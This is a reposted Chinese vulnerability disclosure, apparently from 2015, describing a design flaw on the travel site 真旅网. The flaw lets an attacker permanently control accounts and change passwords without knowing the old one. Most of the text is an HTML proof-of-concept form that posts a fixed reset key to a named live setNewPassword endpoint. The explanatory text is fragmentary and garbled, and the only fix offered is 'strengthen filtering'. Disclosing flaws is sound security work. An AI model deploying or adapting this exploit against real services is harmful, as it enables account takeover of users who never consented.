来源:未知 时间:2015-04-15 13:42 作者:xxadmin 阅读:次
[导读] 真旅网设计缺陷导致持久控制账号及无需原密码修改密码 这个key可以通过 获得 这里可以看到需要原密码 地址栏有个key 放到 漏洞 证明里面的代码中 无需原密码修改密码 这个key不会变...
|
真旅网设计缺陷导致持久控制账号及无需原密码修改密码 这个key可以通过
获得
<div class="row gray-border" style="margin-top:20px;">
<h3 class="title"><strong>设置新密码</strong></h3>
<div class="row" style="height:330px;">
<ul class="find_password">
<form action="http://store.tdxinfo.com/tops-front-purchaser/user/setNewPassword" method="post" name="setNewPasswordForm">
<li>
<label><div>新登录密码:</div><input type="password" name="password" class="normal_txt" style="width:150px;"/></label>
</li>
<li>
<label><div>确认新密码:</div><input type="password" name="confirmPassword" class="normal_txt" style="width:150px;" placeholder=""/></label>
</li>
<li>
<div style="margin-left:130px;">
<a class="adaptiveButton brightRed_btn" href="javascript:void(0);" onclick="document.setNewPasswordForm.submit();">
<span class="left"></span>
<span class="center center_1">确 认</span>
<span class="right"></span>
</a>
</div>
</li>
<input name="key" type="hidden" value="546f231545cec70f6b535eda"/>
</form>
</ul>
</div>
</div>
加强过滤 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
